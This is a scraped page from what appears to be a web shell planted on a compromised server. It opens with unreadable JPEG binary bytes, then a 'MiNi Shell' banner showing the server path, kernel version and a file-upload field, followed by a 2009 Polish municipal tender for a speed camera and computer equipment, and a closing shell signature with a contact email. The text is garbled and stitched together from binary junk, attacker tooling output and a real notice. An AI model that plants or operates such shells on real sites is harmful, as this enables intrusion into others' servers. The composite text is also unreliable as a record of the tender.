JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090416/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090416/63053-N-2009.html

<p class="kh_header"><b>Daleszyce: Dostawa fotoradaru, zestawu komputerowego wraz z oprogramowaniem.</b><br>
<b>Numer ogłoszenia: 63053 - 2009; data zamieszczenia: 16.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Daleszyce , pl. Staszica 9, 26-021 Daleszyce, woj. świętokrzyskie, tel. 0-41 3171693, faks 0-41 3171693.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.daleszyce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa fotoradaru, zestawu komputerowego wraz z oprogramowaniem..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Dostawa fotoradaru, zestawu komputerowego wraz z oprogramowaniem.

Wspólny Słownik Zamówień (CPV): 33211500-7 
1.	Opis przedmiotu inwestycji.
Dane techniczne: 
         Przedmiotem zamówienia jest dostawa fabrycznie nowego urządzenia do pomiaru prędkości pojazdów w ruchu drogowym z jednoczesną rejestracją wykroczeń w formie zdjęcia wykonywanego techniką cyfrową wraz ze sprzętem komputerowym oraz programami komputerowymi do obróbki materiału zdjęciowego i emisji  kompletnej dokumentacji mandatowej dla Straży Miejskiej w Daleszycach o niżej przedstawionych parametrach :
1.Urządzenie  uniwersalne przystosowane do pomiarów w dowolnym miejscu  na poboczu drogi
 -praca ze statywu
-praca w kontenerze
-praca w obudowie na maszcie
-pomiar z pojazdu  
2.Urządzenie musi posiadac możliwość :
a.urządzenie przystosowane do zdalnego przesyłu informacji
b.pomiaru prędkości i  rejestracji pojazdów do dwóch pasów ruchu z dokładnym wizerunkiem twarzy kierującego
c.pomiaru prędkości i rejestracji pojazdów zbliżających się i oddalających względem przyrządu lub razem oba kierunki
d.rozróżniania i rejestrowania pojazdów osobowych i ciężarowych i możliwość ustawienia odrębnych prędkości w tym samym czasie dla samochodów ciężarowych i samochodów osobowych
e.możliwość rejestracji w pamięci liczby wykroczeń, liczby pojazdów przejeżdżających
f.możliwość odtworzenia na miejscu i w dowolnym czasie dokumentacji zdarzenia bez konieczności zatrzymywania pracy urządzenia
g.byc przystosowane do pracy w okresie całej doby a zdjęcia w porze nocnej winny być wykonywane bez oślepienia kierowców z czytelną tablicą rejestracyjną oraz twarzą kierującego
h.identyfikacji w tle zdjęcia -numeru urządzenia, daty i czasu pomiaru z dokładnością do 1 sekundy ,prędkości dozwolonej i stwierdzonej ,numeru zdjęcia,lokalizacji pomiaru oraz kierunku pomiaru.
i.rejestracji czytelnego zdjęcia w całym zakresie mierzonych prędkości z możliwością nie budzącego wątpliwości rozpoznania kierującego i dokładnego odczytania numeru rejestracyjnego pojazdu.
j.możliwość wykonywania zdjęć ze statywu lub z kontenera na poboczu drogi ,z obudowy na maszcie jak również z pojazdu zaparkowanego na poboczu drogi przy otwartej i zamkniętej klapie samochodu.
k.wyposażenie w dwa zestawy akumulatorów  do wersji przewoźnej i wersji stacjonarnej  i czas działania zestawu min.8 godzin
3.Ponadto system powinien spełniać następujące założenia:
a.wyposażenie urzadzenia w panel sterujący;ekran  dotykowy lub klawiaturowy umożliwiający łączność bezprzewodową
b.wyeksponowanie dowolnego fragmentu zdjęcia np.numer rejestracyjny pojazdu,twarz kierowcy z możliwością ustawienia jasności oraz kontrastu
c.umożliwiać przenoszenie zawartości do komputera i posiadać kompatybilny program komunikacyjny do przenoszenia zawartości pamięci  do innych programów analitycznych
d.posiadać program do obróbki materiału zdjęciowego oraz emisji kompletnej dokumentacji postepowania w sprawie o wykroczenie (mandatowej) z licencją i oświadczeniem o możliwości jej modyfikacji według potrzeb zamawiającego (zainstalowanie programu na komputerze wskazanym przez zamawiającego na koszt własny wykonawcy i dostarczeniu urządzenia zamawiającemu).
e.urzadzenie musi być przystosowane do pracy w temperaturze od -10 stopni do + 50 stopni Celsjusza
f.możliwość porządkowania bazy danych według zadanych kryteriów -rosnąco i malejąco
g.możliwość wyszukiwania wykroczeń według zadanych kryteriów :daty,czasu,prędkości,numeru zdjęcia,numeru rejestracyjnego pojazdu,numeru prowadzonej sprawy.
h.sprzet komputerowy,pulpity sterownicze,oprogramowanie oraz instrukcje winny być w języku polskim
4.Inne warunki techniczne to:
a.kamera o cyfrowym zapisie zdjęć  nie mniejszym niż 1.5 mln pikseli
b.możliwość uzyskania zdjęć w efekcie głębi koloru min 16 bit
c.odpowiednie filtry redukujące refleksy na szybach przednich pojazdów
d.lampa błyskowa o osobnym źródle zasilania i możliwość ciągłej pracy bez efektu przegrzania
e.czas przeładowania lampy błyskowej max 0.5 sekundy
f.możliwośc wykonania zdjęć zarówno w dzień jak i wnocy bez oślepiania kierujących pojazdami
g.zakres pomiaru od 20 do 250 km/h a dokładność pomiaru  +/- 3km/h do 100 km/h oraz +/- 3% powyżej 100 km/h
h.ustawienia prędkości co 1 km/h
i.sprzet komputerowy o wymaganiach :
-urzadzenie musi  być przystosowane w pełnym zakresie do współpracy z urządzeniem wykonującym pomiar na drodze oraz urzadzeniem wykonującym pomiar w stacji bazowej
-posiadac zainstalowane oprogramowanie rekomendowane przez  producenta urzadzenia pomiarowego,które umożliwi poprzez łącznośc bezprzewodową sterowanie pracą urządzenia pomiarowego na odległość oraz podgląd rejestrowanych wykroczeń przekroczenia prędkości
-mieć możliwość poprzez system łączności bezprzewodowej przenoszenia zarejestrowanych przekroczeń prędkości ze stacji bazowej do swojej pamięci a poźniej poprzez pamięć przenośną USB do komputera bazowego
-posiadać alternatywne urzadzenie umożliwiające pobór prądu z instalacji samochodowej(zasilacz samochodowy).
5.Komputer bazowy z oprogramowaniem umożliwiającym analizę i gromadzenie danych z fotoradaru o nie gorszych parametrach niż :
-procesor dwurdzeniowy INTEL lub AMD
-pamięć operacyjna DDR 2 2GB
-dysk twardy  250 GB
-nagrywarka DVD RW+/-
-płyta główna z obsługą pamięci w trybie dwukanałowym, 4-6 gniazd USB 3x PCI ,1 x PCI Express 16x,
 gniazdo LAN 100 Mb
-karta graficzna PCI Express 16x,256 MB ,128 bit
-napęd dyskietek 1,44 MB
-obudowa MIDI
-system operacyjny Windows XP Professional SP 3
-pakiet MS Office 2008
-akcesoria: mysz optyczna ,klawiatura,pamięć  flash USB 4GB ,czytnik kart flash 5in1
-monitor 22 LCD
-drukarka kolorowa laserowa ,format papieru A-4
-skaner kolorowy 600 dpi
6.System operacyjny oraz oprogramowanie powinno umożliwiać co najmniej:
-tworzenie baz danych zawierających zdjęcia z uwzględnieniem daty wykonania pomiaru,numeru zdjęcia,nr.rej.pojazdu,danych osobowych kierującego przypisanych do pojazdu
-umieszczenie adnotacji procesowych do każdego zdjęcia
-przeglądanie zdjęć
-wyszukiwanie zdjęć według daty,numeru zdjęcia,nr.rejestracyjnego pojazdu,danych osobowych właściciela pojazdu,miejsca dokonywanego pomiaru
-cyfrową korektę zdjęcia w celu polepszenia identyfikacji pojazdu i twarzy kierowcy
-porządkowanie bazy danych według czynności procesowych
-wykorektowanie zdjęcia twarzy pasażerów fotografowanego pojazdu.

7.Do oferty dołączyć kompletną instrukcję montażu i obsługi urządzeń napisana w języku polskim oraz przykłady gotowych raportów o wykroczeniu.
8.Wykonawca przeszkoli na koszt własny wskazanych strażników Straży  Miejskiej w Daleszycach w zakresie obsługi dostarczonego sprzętu oraz programów komputerowych do stopnia bezbłędnego praktycznego opanowania przez nich umiejętności ich obsługi, co będzie potwierdzone wydaniem zaświadczeń ukończenia takiego szkolenia
9.Minimalny okres  gwarancji  24 miesiące. Ponadto Wykonawca zapewni w okresie,co najmniej 3 lat serwis pogwarancyjny
10.Odbiór urządzenia odbędzie się w siedzibie Zamawiającego
11.Wykonawca dostarczy urządzenie wraz z legalizacją pierwotną.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.21.15.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.05.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Warunkiem przystąpienia do przetargu jest wniesienie wadium w wysokości 
2 000 PLN (słownie złotych: dwa tysiące).Wadium winno być wniesione w formie określonej w art. 45 ustawy Prawo zamówień publicznych.                           
Dowód wniesienia wadium należy dołączyć do oferty.
W przypadku wniesienia wadium w formie pieniężnej należy dokonać przelewu na rachunek bankowy: 
 nr 04 8485 0009 0000 0130 9000 0002   z takim wyprzedzeniem, aby w dniu otwarcia 
 ofert tj. o godz.  9 00 środki znalazły się na koncie Zamawiającego
Zwrot lub utrata wadium następuje na warunkach określonych w art. 46 ustawy Prawo zamówień publicznych.
Gwarancja bankowa lub ubezpieczeniowa musi zawierać w swojej treści zapis o realizacji gwarancji na rzecz Zamawiającego zgodnie z podstawami zatrzymania wadium zawartymi, w art. 46 ust  4a i 5 ustawy Prawo zamówień publicznych,<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O  udzielenie zamówienia mogą ubiegać się Wykonawcy , którzy:
O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych:
1.	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
2.	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia.
W zakresie wiedzy i doświadczenia wymagane jest wykonanie w okresie ostatnich trzech lat minimum 3 zadań z zakresu dostawy przyrządu do pomiaru prędkości i rejestrowania pojazdów przekraczających dopuszczalną prędkość, każde o wartości nie mniejszej niż 70% ceny ofertowej.
3.	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
4.	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych.
5.	udzielą min. 2 letniej gwarancji na dostarczony sprzęt.
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na podstawie zawartych w ofercie oświadczeń i dokumentów wymaganych w pkt 7 SIWZ - wg formuły spełnia - nie spełnia.
Nie spełnienie chociażby jednego warunku, skutkować będzie wykluczeniem wykonawcy z postępowania. 


1.	Z  ubiegania o udzielenie zamówienia  publicznego wyklucza się Wykonawców, którzy:

1) nie spełniają warunków udziału w postępowaniu o udzielenie  zamówienia publicznego z art. 22 ust. 1 
     ustawy - Pzp,
2) podlegają  wykluczeniu z postępowania na podstawie art.24 ust. 1 i 2 Pzp.,


2.	Zamawiający odrzuca ofertę Wykonawcy, jeżeli:

1) jest  niezgodna z ustawą ,
2) jej treść nie odpowiada treści SIWZ,
3) jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej 
     konkurencji,
4)  zawiera  rażąco niską cenę w stosunku do przedmiotu zamówienia,
5) została złożona przez Wykonawcę  wykluczonego z udziału w postępowaniu o udzielenie  zamówienia,
6)  zawiera  błędy w obliczeniu ceny,
7) Wykonawca w terminie 3 dni od dnia doręczenia  zawiadomienia nie zgodził się na poprawienie omyłki, polegającej na niezgodności oferty ze specyfikacją istotnych warunków zamówienia nie powodujących  istotnych zmian w treści oferty,
8) jest  nieważna  na  podstawie odrębnych przepisów.


3. Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w oparciu                                 o dokumenty złożone przez Wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia- nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełnienia warunków udziału w postępowaniu określonych w art. 22 ust. 1, wykonawca składa oświadczenie zawarte w formularzu OFERTA.
1. Zamawiający w celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy Prawo Zamówień Publicznych, żąda załączenia do oferty:
a)	aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
W przypadku składania oferty przez Wykonawców występujących wspólnie ww. dokument musi być złożony przez każdego Wykonawcę.
2.	Zamawiający w celu potwierdzenia, że wykonawca posiada niezbędną wiedzę 
i doświadczenie oraz dysponuje osobami zdolnymi do wykonania zamówienia, żąda załączenia do oferty:
a)	wykazu wykonanych dostaw w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców - sporządzonego wg załącznika nr 2 - DOŚWIADCZENIE ZAWODOWE
Wymagane jest wykazanie minimum 3 zadań z zakresu dostawy przyrządu do pomiaru prędkości i rejestrowania pojazdów przekraczających dopuszczalną prędkość, każde o wartości nie mniejszej niż 70% ceny ofertowej.
Do wykazu należy załączyć dokumenty potwierdzające, że wykazane dostawy zostały wykonane należycie.
W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia, ww. warunek mogą spełniać łącznie.

3. Zamawiający w celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego, żąda załączenia do oferty:

1) Zatwierdzenia Typu Urządzenia i Typu Kontenera wydane przez Główny Urząd Miar o dopuszczeniu urządzenia do eksploatacji zgodnie z przepisami określonymi w Ustawie z 11 maja 2001 r. Prawo o miarach (Dz. U. nr 63, poz. 636).

2) Orzeczenia Laboratorium Ochrony Radarowej wydane przez LOR przy PIT 
w Warszawie lub inne uprawnione laboratorium o braku zagrożenia dla ludzi i środowiska.

3) Aktualnego świadectwa legalizacji wydanego przez właściwy Urząd Miar.

4) Przykładowych zdjęć wykonanych przy pomocy oferowanego i spełniającego warunki SIWZ przyrządu w różnych warunkach atmosferycznych i różnych okresach w ciągu doby w zasięgu znaków drogowych powodujących refleksy świetlne. Wykonane zdjęcia muszą być czytelne a twarze kierujących rozpoznawalne. Zdjęcia muszą posiadać możliwość identyfikacji w tle - numeru i nazwy urządzenia, którym zostały wykonane, daty i czasu pomiaru z dokładnością do 1 sekundy, prędkości dozwolonej i stwierdzonej, numeru zdjęcia, lokalizacji pomiaru oraz kierunku pomiaru. Zdjęcia muszą być wykonane w ciągu tygodnia poprzedzającego termin składania ofert. 

a.	10 kolejno ponumerowanych zdjęć wykonanych w godzinach porannych 6.00 - 7.00;
b.	10 kolejno ponumerowanych zdjęć wykonanych w godzinach południowych 12.00 - 13.00;0 kolejno ponumerowanych zdjęć wykonanych w godzinach nocnych 22.00 - 23.00;

Uwaga:
Dokumenty (wymienione w punkcie 1. i 2.) winny być przedstawione w formie oryginału lub kserokopii poświadczonej przez Wykonawcę - za zgodność z oryginałem.
Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez Wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości.
Zamawiający wykluczy Wykonawców którzy nie złożą oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków 
lub złożone dokumenty będą zawierały błędy, z zastrzeżeniem:
-	Zamawiający wezwie wykonawców, którzy w określonym terminie nie złożą oświadczeń lub dokumentów potwierdzających spełnianie warunków udziału w postępowaniu lub którzy złożą dokumenty zawierające błędy, do ich uzupełnienia w wyznaczonym terminie, chyba że mimo ich uzupełnienia oferta wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania.
-	Zamawiający może wezwać, w wyznaczonym przez siebie terminie, do złożenia wyjaśnień dotyczących oświadczeń i dokumentów, o których mowa w art. 25 ust. 1 ustawy PZP.
VIII.	Informacje o sposobie porozumiewania się Zamawiającego z Wykonawcami oraz przekazywania oświadczeń lub dokumentów, a także wskazanie osób uprawnionych do porozumiewania się z wykonawcami.
W postępowaniu o udzielenie zamówienia oświadczenia (z wyłączeniem wymienionych w pkt. 7 SIWZ), wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują pisemnie, faksem lub drogą elektroniczną.
Jeżeli Zamawiający lub Wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje faksem lub drogą elektroniczną, każda ze stron na żądanie drugiej niezwłoczne potwierdza fakt ich otrzymania.


Adres Zamawiającego: Urząd Miasta i Gminy w Daleszycach Pl. Staszica 9
 26-021 Daleszyce
Faks  Zamawiającego:    (41) 317-16-93
Osoby uprawnione do porozumiewania się z wykonawcami:
w sprawach przedmiotu zamówienia                       - Wiesław Pióro - tel. (41) 317-16-94 w. 122
	                                         Komendant Straży Miejskiej w Daleszycach
	                                       - Adam Kmiecik  - tel. (41) 317-16-94 w. 135
								        Inspektor ds. zamówień publicznych
Wykonawca może zwrócić się do Zamawiającego o wyjaśnienie treści SIWZ. Zamawiający jest obowiązany niezwłocznie udzielić wyjaśnień, chyba że prośba o wyjaśnienie wpłynęła 
do Zamawiającego na mniej niż 6 dni przed terminem składania ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 60</li>
<li>2 - ocena jakości zdjęć - 40</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://bip.daleszyce.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Daleszycach 
Pl. Staszica 9
26-021 Daleszyce
pok. 22  Komenda straży miejskiej.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.04.2009 godzina 10:00, miejsce: Urząd Miasta i Gminy w Daleszycach 
Pl. Staszica 9
26-021 Daleszyce
pok. 25 Sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com